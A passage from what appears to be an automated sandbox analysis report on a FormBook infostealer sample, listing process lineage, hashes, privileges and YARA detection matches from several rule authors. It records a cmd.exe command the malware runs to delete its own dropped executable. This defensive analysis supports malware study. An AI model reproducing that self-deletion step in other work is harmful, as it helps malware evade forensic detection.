                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.310331740.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.310331740.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.310331740.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              Reputation:low

                                                              Analysis Process: explorer.exe PID: 3472 Parent PID: 6668

                                                              General

                                                              Start time:11:04:08
                                                              Start date:08/04/2021
                                                              Path:C:\Windows\explorer.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:
                                                              Imagebase:0x7ff693d90000
                                                              File size:3933184 bytes
                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Analysis Process: raserver.exe PID: 3536 Parent PID: 3472

                                                              General

                                                              Start time:11:04:24
                                                              Start date:08/04/2021
                                                              Path:C:\Windows\SysWOW64\raserver.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\SysWOW64\raserver.exe
                                                              Imagebase:0xcb0000
                                                              File size:108544 bytes
                                                              MD5 hash:2AADF65E395BFBD0D9B71D7279C8B5EC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.504377982.0000000000380000.00000040.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.504377982.0000000000380000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.504377982.0000000000380000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.507153893.0000000000C80000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.507153893.0000000000C80000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.507153893.0000000000C80000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              Reputation:moderate

                                                              Analysis Process: cmd.exe PID: 6776 Parent PID: 3536

                                                              General

                                                              Start time:11:04:31
                                                              Start date:08/04/2021
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:/c del 'C:\Users\user\Desktop\hvEop8Y70Y.exe'
                                                              Imagebase:0x10a0000
                                                              File size:232960 bytes
                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Analysis Process: conhost.exe PID: 6828 Parent PID: 6776

                                                              General

                                                              Start time:11:04:31
                                                              Start date:08/04/2021
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7ecfc0000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Disassembly

                                                              Code Analysis

                                                              Reset < >